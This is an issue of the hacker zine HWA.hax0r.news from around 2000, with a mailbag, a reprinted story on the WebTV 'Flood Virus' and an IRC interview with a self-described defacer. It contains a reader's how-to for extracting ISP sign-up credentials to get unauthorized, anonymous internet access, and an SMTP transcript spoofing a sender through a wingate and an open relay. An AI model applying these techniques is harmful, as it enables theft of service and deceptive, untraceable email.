HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR
EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO
READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

** USE NO HOOKS **

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. 
Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for
lame questions!
My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2.
MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. New members/affiliates Xistence ..... General news and Dutch/German translations sP|a|Zm ..... Swedish news / translations SugarKing ..... General news articles * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs* Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ theduece ytcracker loophole BlkOps MostHated vetesgirl Slash bob- CHEVY* Debris pr1zm JimJones Dragos Ruiu pr0xy MR^CHAOS Eckis Fuqrag Messiah v00d00 meliksah dinkee omnihil sP|a|Zm OE KillNow iPulse erikR prizm paluka Xistence doobee phold hi ;) {} mixter merXor abattis Xistence #darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I /storm/ did you do it yet? ;-) i'll get your shit in here soon.. promise :) shouts to Xochitl13 for sending the cool postcard with a pic of the la 2600 meeting place. cheers dude! Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) And many others, sorry if i missed you or forgot you! mail me and i'll flail myself unforgivingly in front of my open bedroom window until I bleed, then maybe, add u to the list (please, don't ask for pics...) 
Also mad props to doobee and the CCC (Chaos Computer Club) in Germany for setting up a new listserv system to help distribute the zine. (Will be in action soon, I have admin work to do first and testruns..). :-))) Ken Williams/tattooman ex-of PacketStorm, SpaceRogue for running a kick ass news net Emmanuel Goldstein for pure staying power All the crackers, hackers and phreakers The sysadmins, NOC controllers, network engineers IRCops, security professionals, tiger team operatives military cyberwar grunts, feds and 'special computer unit' coppers trying to keep shit together in this anarchic chaos. AND Kevin Mitnick (free at last, stay free this time man...) Kevin was released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ Recently reported 'helping' out the feds with security advice! kewl sites: + http://hackdesk.dhs.org/ NEW -> NEWBIE help + MORE + http://www.hack.co.za **DOWN ** EfNet channel: #darknet + http://blacksun.box.sk. + http://packetstorm.securify.com/ + http://www.securityportal.com/ + http://www.securityfocus.com/ + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://www.pure-security.net/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." 
- FProphet '99

Since we provide only the links in this section, be prepared for 404's - Ed

+++ When was the last time you backed up your important data?

++ http://zcaofficedirectory.com/

Beware of "pay-per-call" Area Code 809 SCAM! Do not respond to e-mails, phone
calls, or pages which inform you to call a Caribbean Islands Area Code " 809 "
phone number. If you call from the United States, you will apparently be
charged $25.00 per minute (without being warned beforehand). It's important
to prevent becoming a victim of this SCAM. Check all area codes before
returning a call.

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, Zym0t1c and also to Spikeman for sending in past
entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** NEW WEB BOARD! ***
========================================================================

The message board has been REVIVED with a new script and is doing quite well.
Check it out http://discserver.snap.com/Indices/103991.html .

Don't be shy with your email, we do get mail, just not much of it directed to
other readers/the general readership. I'd really like to see a 'readers mail'
section. Send in questions on security, hacking IDS, general tech questions or
observations etc, hell we've even printed poetry in the past when we thought
it was good enough to share.. - Ed

=======================================================================

* An interesting usenet email with a cool telephony URL to check out: *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 25 Feb 2000 12:33:09 -0600
From: "Jennifer 'AstroJenn' Martino"
Subject: Re: HWA.hax0r.news Underground Security
Organization: Not today. Not yesterday. And probably not tomorrow.
To: Cruciphux
Reply To: jennmartino@my-deja.com

i have a few phone sounds that you might be interested in..
cycle tone sweeper, switch verification messages, unidentifiable messages,
those recordings that say a bunch of numbers, spit out touch tones and hang
up, test messages, etc. less interesting than the above, but i also have
recordings of some odd error messages, loops, blue box tones, red box tones,
touch tones, ccitt5, a call from a jail. when applicable, the filename is the
actual phone number i called to receive the sound. unfortunately they are not
in ram nor mp3 formats but.. you can find my collection at

hope that helps,
jenn

--
The Web Page You Have Reached http://twpyhr.usuck.com
Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes FAQ"
"The Phoney Dance. A collection of telephone graphics.
Jenn's Joint http://jennsays.usuck.com My Ob-Personal Page.

-=-

Freebie net hack ... these things are everywhere now, if you can't get net
access for free or dirt cheap you're paranoid or living under a rock :-) ...
of course remember, you get what you pay for - Ed

From: M* H*
To:
Sent: Friday, March 24, 2000 9:58 AM
Subject: submission

I wrote this text just now, thought it might be useful (dont use my realname
or something plz).

Grtz,
m-m

-------------------------------------------------------------------------------

************************************************************
* HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS *
* m-m *
************************************************************

YOU'LL NEED:

Windoze (I'm sorry!)
A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com)
One of them ISP CD's with the M$ Internet Connection Wizard

HOW DOES IT WORK:

For the ones that don't know what the internet connection wizard is, i'll
explain quickly. Since ISP's are constantly dying to get new members, they
(sometimes) give away free CD's with magazines and stuff.
All ICW does is make a temporary connection to a server, get some HTML, run
Internet Explorer in fullscreen and have you fill in some stupid forms which
will be CGI'd to the administration so you'll get your internet account...
and the bill. Filling in false info can be useful, but won't work long + it's
illegal.

For the temporary connection to the server ICW just makes a new Dial-up
connection. So what you need to do is just boot up one of them CD's, make
that connection, alt+tab away and use the PWL Reader to get the temporary
info for the account. Cancel your subscription and throw away the CD. The
connection gets deleted from your dialup's automatically to prevent such
abuse.

Load up your normal internet connection and go to that ISP's website. Go for
technical support and get the nearest PoP. (Read: telephone number to log
in). Now make a new dialup connection with that number and the login name and
password you just earned with the PWL reader. Voila. You're connected.
(Note: these are usually guest/guest or stuff like that). Try reaching an
external website (i.a. www.news.insource.nl). If you can't connect it
probably means the ISP was smart and blocked all external traffic for the
sign up account.

I've tried this on several ISP's and it worked most of the time. Some ISP's
were smart enough to block such jokes but some weren't. Since free internet
is a fact these days this is only useful to remain anonymous. (if you're
hacking or something).

end of email

-=-

From: Dragos Ruiu
To: <*>
Sent: Thursday, March 23, 2000 10:53 PM
Subject: kyxspam: hnn hacked?

After fielding TV reporter questions on the subject... I tried to go see what
HNN had to say about Max, and www.hackernews.com got me a page that said:

White House White House WhiteHouse White House WHite House
White House
... definitely not what I was looking for ....

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-

Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious)
possibly a dns grab (someone pointing the hostname at another server, rather
than a break-in on the site itself), unknown at this time ... i'd have
expected HNN to acknowledge any hacks successful or not. Site whitehouse.com
is a porn site... take that as you will.

-=-

From: Mr. Unknown
To:
Sent: Wednesday, March 22, 2000 7:18 PM

First I want to say the zine is kickass. SugarKing pointed me to the latest
one. Read it last nite at work. That really sux that Fuqrag was raided. I work
at a place where he did a defacement and maybe some other stuff. ;) Since
then, I have been interested about what else he was doing. Only could catch
the latest defacements, though.

I get a good laugh at work when the servers go down and say "FUQRAG IS BACK!"
They freak! haa haa so funny it really pisses them off. They won't listen to
me about our network's security since I am only a pc tech. and they are big
MCSE's. I thought MCSE's had to know their shit? They set up a ftp server and
told everyone that it didn't allow anonymous log in, ha, should've seen their
faces when some good pics showed up in their personal directories. After they
still hadn't figured out who it was, I told them how to fix that problem. What
do you know, the next day my admin rights were gone, and the test account
another admin setup for me was gone. Even showed them problems with asp. It's
just pissing them off and they are not doing anything about it. Not even
patching old holes. Very discouraging for me, when I can show them how to fix
their shit. You would think after being hacked they would do something.

reading the interview with fuqrag was some kewl shit.
I hope they take it easy on em. I hope he writes some articles for the zine,
too. Anyway I just wanted to let you know that the zine kicks ass and content
is good. I wish to be as 313373 as fuqrag!! Keep up the great work

mr.unknown

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

-=-

The kind of mail we love getting ... :-) - Ed

And some interesting SPAM ?!?

Dear Web Master,

Do you want to know how your computer skills rate? Take a FREE Brainbench
certification exam ONLINE and find out how good your IT skills really are.

Every day, thousands of technical professionals take a FREE Brainbench
certification exam online to rate their skills. They use the test results to
get a better understanding of their strengths and weaknesses or to earn a
certification that helps them get a better job.

It only takes a moment to register online for an exam. You will then
immediately receive your FREE test access code, which will allow you to take
the multiple-choice exam anytime within the next 30 days.

Register NOW at http://destinationsite.com/c?c=71838.2597.0.3128.0

If you pass the exam, Brainbench will certify your skill and mail you an
attractive 8 1/2" x 11" certificate FREE! Plus you can make your certification
available online if you choose.

As the world's leading skills certification authority, Brainbench
certifications are recognized by major employers and staffing organizations
throughout the world.

============================================================
Register for any FREE exam NOW and automatically enter a monthly drawing for
$500. http://destinationsite.com/c?c=71838.2597.0.3128.1
Take advantage of this great offer! Pass it along to your friends!
Brainbench has 60 different exams to choose from!
============================================================

How does it work?

1) Register for an exam at http://destinationsite.com/c?c=71838.2597.0.3128.2
There are about 60 exams to choose from.
You will receive instructions on how to complete the exam when you register.

2) When it is convenient for you, enter your test code at the Brainbench
website. You will take the multiple-choice exam online. It will take about 45
minutes. You can take it ANYTIME from ANYPLACE using a common web browser.
(version 3.0 or later preferred).

3) As soon as you finish the exam, you can view your test results including
your skill rating (on a scale of 1.00 - 5.00) with a list of your strengths
and weaknesses. To certify you need a score of 2.75 or higher. To certify as
a Master, you need a score of 4.00 or higher. The test engine is
computer-adaptive, meaning it will adjust to your skill level so whether you
are a novice or an expert, it will ask questions that are close to your skill
level.

4) All your information is held private unless you allow it to be released.

Who recognizes Brainbench certifications?

1) Virtually all employers recognize Brainbench certifications- we are the
leading independent certification authority with over 500,000 exams ordered
last year!

2) Top technology companies and top staffing companies use Brainbench exams
to screen their technical staffs, including: Ernst & Young, EDS, CSC,
PriceWaterhouseCoopers, kforce.com, JP Morgan and many others.

3) Due to Brainbench's secure adaptive-testing method, employers trust the
Brainbench approach to validating a job candidate's skills.

What does it mean to be certified?

1) It means you join the ranks of those professionals who can prove that they
have the credentials to do a job. Employers will be more likely to put their
trust in you.

2) You can pursue, with confidence, the jobs you want.

3) Whether you pass or not, every time you take the test you will receive a
private report on your strengths and weaknesses as well as your personal
ranking in the industry.

Is it really FREE?

Yes. There is absolutely NO CHARGE to you. You can take the exam FREE. We'll
mail your certificate, FREE. There are no hidden costs.
We are doing this because we want to grow the number of people who receive
the benefit of a Brainbench certification exam. We will eventually charge
people to take the exam, but for now it is FREE. So enjoy, and please- pass
this on to your friends.

Register now for your FREE exam: at
http://destinationsite.com/c?c=71838.2597.0.3128.3

Mike Littman
Cofounder, Brainbench, The skills authority

-=-

From:
To:
Sent: Saturday, March 18, 2000 5:42 AM
Subject: Need a hand? ... I mean, Help?

Hello, there... I came across your HWA newsletter. I read you are looking
for help. I have no clue about hacking and all the magic that you guys do. I
can tell you it fascinates me, and I've been reading attrition for quite a
while. I work with computers (as in: Dummy 101 . Can't expect much from
blondes...*ugh*) I'm originally from Italy. So, If you ever come across
something to translate from Italian to English I would be more than happy to
help you out. I'd like to keep a very-very low profile. No profile at all
would even be better.

Just my 2 Cents. You're doing a wonderful job...

Ciao, ciao
Simona

-=-

Don't usually post these, but just to prove we do get offers of help so
don't sit there get up and do something too! :-)) - Ed

-=-

Using cablemodem? especially on the @HOME network? expect weird shit, the
teething problems aren't over .. here's an interesting diatribe from Dragos on
some recent @home-isms ... - Ed :

From: Dragos Ruiu
To: <*>
Sent: Monday, March 20, 2000 11:58 PM
Subject: kyxquestions: @home puke

Here are more puzzles for all you armchair hacker sleuths...

In the last two days my cablemodem has started spewing ICMP Host Unreachable
packets from a local 10.11.* address to seemingly random addresses but each
address is repeated multiple times. Most of the dest hosts are in
207.230.246.* We are talking about lots of packets here... every couple of
min. This was preceded by the unusual occurrence of 10.11.* -> 10.11.*
traffic.
Which was followed by mapping and poking at random 10.11.* addresses from
varied addresses. 10.11 is where @home puts their cablemodems. As to why I
would be seeing this stuff on the client side of my cablemodem that's a good
question - especially those 10.11 -> 10.11 packets. I haven't ruled out some
flaky modem or router yet blasting garbage into the ether, and @home has been
having to "reboot their servers" a lot lately.

Other weird stuff is broadcasts from 10.11.* hosts on port 121 to subnet
broadcast addresses.

Looking back into the logs shows that this kind of ICMP storm has happened in
the past weeks on and off a couple of times. Interestingly, before today...
the destination was always in the 172.16.*.* address space. Each time, the
activity starts, is heavily active and then stops within minutes.... only
today it seems to be going on and not abating and it seems to like
destinations of 207.230.246.[170,253] (what looks like a name server {woop,
woop, danger will robinson} and a test box at vsb.bc.ca and 24.112.31.56 and
172.16.6.195 (no reverse dns lookup avail) as its favorite destinations.
Today's activity seems to all come from one cablemodem and the activity in the
past seemed to vary in source modem address. The single source says to me
that it may just be one flaky modem.

Now I gotta go and find where the whois registry for the ca domain hides.

Miscellaneous crud: 24.113.85.105 cr547339-a.surrey1.bc.wave.home.com which
seems to be running some sort of port-1080-wingate sort of thing has been
trying to log in to an ftp server here, when he oughtn't. And lots and lots
of the typical wingate scans and along with oodles of the not so common yet
Trin00/TrojanCow/DeepThroat 3.1 traffic/scans. Anybody got a good
rundown/synopsis of DeepThroat or Trojan Cow they can point me to? I have to
go see what ArachNIDS says. BTW for those that are keeping score Trojan Cow
seems to be the winner in the number of hosts infected dept.
if the # of different sources of the broadcasts and volume are any
indication.

Bottom line: Something is weird and new. We also had a runaway lynx process
on one server.... now I hear there is a new remote overflow in it (Safer) -
but that is just circumstantial evidence. That plus another potentially false
outbound xterm trigger all leads to the old spidey senses saying... fee fi fo
fum... I smell hacking.

P.P.S. for Max and the rules guys... outbound nmap TCP connect scans seem to
false the "AOL chat data" rules in snort, not sure if that's in vision.conf or
rapidnet set yet but I find this a useful falsing that lets me log outbound
nmaps I initiate. :-)

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

-=-

* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~

(Didn't pull any from the board, check it out, some interesting stuff on
there... - Ed)

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* Another monthly release... oh well read on.
     *
     *
     * Cruci
     *
     * cruciphux@dok.org
     * Preferred chat method: IRC Efnet in #HWA.hax0r.news
     *
     */

    printf ("EoF.\n");
    return 0;
}

Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA L6V 4H5

Anonymous email:

telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT

If you got that far everything is probably ok, otherwise you might see

550 cruciphux@dok.org... Relaying denied

or

550 admin@nasa.gov... Domain must exist

etc. (The 354 prompt the server sends after DATA and the 250 "queued" line
it sends after the lone '.' are left out of the transcript above; a relay
refusal normally shows up as the 550 at RCPT TO, before any body is sent.)

* This won't work on a server with up to date rule sets denying relaying and
your attempts will be logged (the Received: headers of anything that does get
delivered carry the address of the wingate you came through) so we don't
suggest you actually use this method to reach us, it's probably also illegal
(theft of service) so, don't do it. ;-)

-=-

Congrats, thanks, articles, news submissions and kudos to us at the main
address: cruciphux@dok.org complaints and all nastygrams and mailbombs can go
to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Clearing up a nasty screw up in issue #51, here's what happened...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I fucked up. Two 'versions' of #51 were actually released, a few early birds
got the "bad" copy. The 'real' copy has (2) in the upper left very top
corner. Collectors edition! :-) Details? nah you wouldn't be interested
anyways....

-=-

@HWA

04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NOTE: I had a gracious offer from *someone* the last time HACK.CO.ZA needed hosting, but unfortunately my mailbox had become corrupted and I lost this message before I could forward it to the site owner Gov-Boi. If after reading this you can still offer services, please send another email to me at cruciphux@dok.org... thanks!

@HWA

05.0 WebTV hit by "Melissa-Type" virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by: Merxenary

Source: C|Net
http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002.

WebTV hit by Melissa-like bug
By Stephanie Miles
Staff Writer, CNET News.com
March 17, 2000, 3:55 p.m. PT

WebTV has been hit by a self-replicating bug that is wreaking havoc with the network's message boards and newsgroups, a situation that knocks back the company's claim that it is immune to viruses and security holes.

The problem, which some are calling the "Flood Virus," gets inside the e-mail system of WebTV owners and prompts the WebTV settop box to litter bulletin board and newsgroup sites on the company's network with redundant junk mail. Like the Melissa virus, the malicious WebTV code sends out the emails under a user's name without their knowledge.

Melissa-type viruses cause damage by clogging email servers of corporations and organizations with illegitimate emails. For WebTV users, the chief problem so far has come in trying to read the intra-network web sites. Bulletin boards on the WebTV network only show five postings at a time. An outbreak of the Flood Virus therefore makes it very difficult for users to find relevant messages on the board. Subscribers also face potential embarrassment, as emails under their name are posted to newsgroups without their knowledge.

Microsoft, which owns WebTV, has confirmed the existence of the problem but claims the situation is a hack rather than a virus. The company added that the problem is not widespread.

Whatever the root cause of the problem, the situation is a black eye for the service. One of WebTV's marketing pitches has been that subscribers do not have to worry about rogue viruses on the Internet.

Microsoft also has had a tempestuous relationship with segments of its subscriber base over technological issues in the past. After gaining attention as the first firm to offer Internet service through the television, WebTV has struggled to build its subscriber base and has encountered criticism from users for failing to support standard Web technologies such as Java. The company was acquired by Microsoft in 1997.

WebTV was recently forced to reverse course and remove banner ads from emails viewed and stored on the site in response to a flood of customer complaints. The backlash comes as WebTV faces a looming challenge from Internet service giant America Online, which is set to launch its AOL TV sometime this summer.

The problem was first discovered by Net4TV, which tracks interactive television. Net4TV came up with the Flood Virus name.

"It's absolutely self-replicating. It inserts the virus code into the signature upon opening the email or going to the newsgroup," said Brian Bock, editor in chief at Net4TV.

The general public does not have to worry about the flaw. It can only come in e-mails from WebTV units and it only affects other WebTV boxes. In addition, all of the excess mail is currently being directed at newsgroups and bulletin boards on the company's network.

The WebTV network is written mainly in HTML, and the company uses HTML shortcuts for certain network features, according to Net4TV. Shortcuts within users' email signature files, the calling card at the bottom of an e-mail message, serve as the entryway for the malicious code. The code manipulates the signature file and then prompts the Web TV unit to post repeatedly to WebTV newsgroups.

WebTV representatives could not confirm this account of how the network is set up. Nonetheless, they acknowledged it exists.

"It's a fundamental flaw in the WebTV architecture," Bock said.

Although WebTV currently counts about one million subscribers, Microsoft is marketing portions of the service along with its TV Pak to cable service providers as Microsoft TV. If portions of the WebTV browser are easily susceptible to these types of attacks, Bock said, it does not bode well for Microsoft TV if it is installed on a widespread basis through cable providers.

"It points to a larger problem," he said, calling for an independent security analysis of the WebTV architecture, similar to that which took place with Microsoft's Hotmail free email service after suffering repeated privacy breaches. "It points to what else may be going on under there."

For its part, WebTV says the problem has only hit a very small number of WebTV Classic users. According to Microsoft, hackers combined two known WebTV hacks: one which inserts malicious code into the user's email signature file, and one which inserts malicious code into postings on the newsgroup itself.

"These two codes were linked together," a spokesperson said, asserting that only 14 of the 594,000 WebTV Classic users have reported being infected with the bug.

WebTV had previously created fixes for the two separate problems when they originally surfaced. The company is working on a more comprehensive patch to be released next week. In the meantime, users should open their signature file to check if any new text or code has been inserted, the WebTV representative said.

@HWA

06.0 BlaznWeed interview, background info, and Sect0r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Cruciphux

BlaznWeed contacted me regarding commenting on some of the things Sect0r said in the interview last issue, so we address those and get a general interview as well... mildly edited to remove general chatter.
- Ed

Interview date: Sun Mar 19/2000
By: Cruciphux

Session Start: Sun Mar 19 15:26:53 2000
[15:26] Session Ident: BlaznWeed (some1@*.*.*.uk)
[15:26] i'm ready
[15:27] ok hi.. sorry to keep ya waiting
[15:27] np
[15:27] i'm pretty informal, no real structure
[15:28] thats fine by me
[15:28] i'll do the preliminary intro questions ...
[15:28] like age interest group affiliations etc
[15:28] i'm 20 and my group is wkD
[15:29] whats wkD stand for?
[15:29] and how long has it been around?
[15:29] wicked
[15:29] how many members and where are they based?
[15:29] how did you meet? irc?
[15:29] :
[15:29] there are many members
[15:30] and i don't know them all
[15:30] some in other groups too?
[15:30] I got introduced to wkD by zeroc
[15:30] who is the founder
[15:30] I don't think so
[15:30] but i can't say for sure
[15:30] he hangs on dalnet mostly
[15:31] you too?
[15:31] yeah
[15:31] why dalnet? any reason?
[15:31] Most of my friends are on dalnet
[15:31] how long have you been on the net?
[15:32] about three four years
[15:32] to
[15:32] how long have you been into computers? same time or longer?
[15:32] the nets is relatively new here in the uk
[15:32] longer
[15:32] about six maybe 7
[15:33] how would you classify yourself? ie: hacker cracker coder scriptkid
[15:33] and do you code? if so in what?
[15:33] hehe
[15:33] yes i do code
[15:34] but i haven't written my own exploits yet
[15:34] oh I forgot 'defacer'
[15:34] :)
[15:34] i'm a full time computer science student
[15:34] i suppose i'd be labeled a cracker
[15:34] so you break into sites but don't deface all of them?
[15:35] If i manage to break into a unix box i don't deface them
[15:35] about how many have you done?
[15:35] simply because i have other uses for them
[15:35] and how long have you been doing it?
[15:35] but the NT boxes i have no use for
[15:35] nod
[15:36] maybe a couple of years now
[15:36] i started off hacking nothing but unix boxes
[15:36] what is your home machine? if more than one box whats your setup?
[15:36] I actually enjoy playing hide and seek with admins
[15:36] heh
[15:36] battle of wits
[15:37] I'm just running linux at home
[15:37] but i used to run solaris
[15:37] but the thing with solaris is that it doesn't run very well on x86 processors
[15:38] so i'm stuck with linux until i can afford a sparc
[15:38] I don't like solaris
[15:38] solaris and linux are like blondes and brunettes i like em both
[15:38] :D
[15:38] and its worse on x86 processors
[15:39] what about *BSD?
[15:39] its closer to real unix than linux*
[15:39] I haven't tried that
[15:39] though i do have a couple of bsd shells
[15:39] legit ones mind
[15:40] without giving details outline a typical hack, ie: what do you use as a base point, do you use pbx or redirectors to dial into hacked accts etc, what country do you use etc
[15:40] yeah i notice
[15:41] no comment
[15:41] hehe
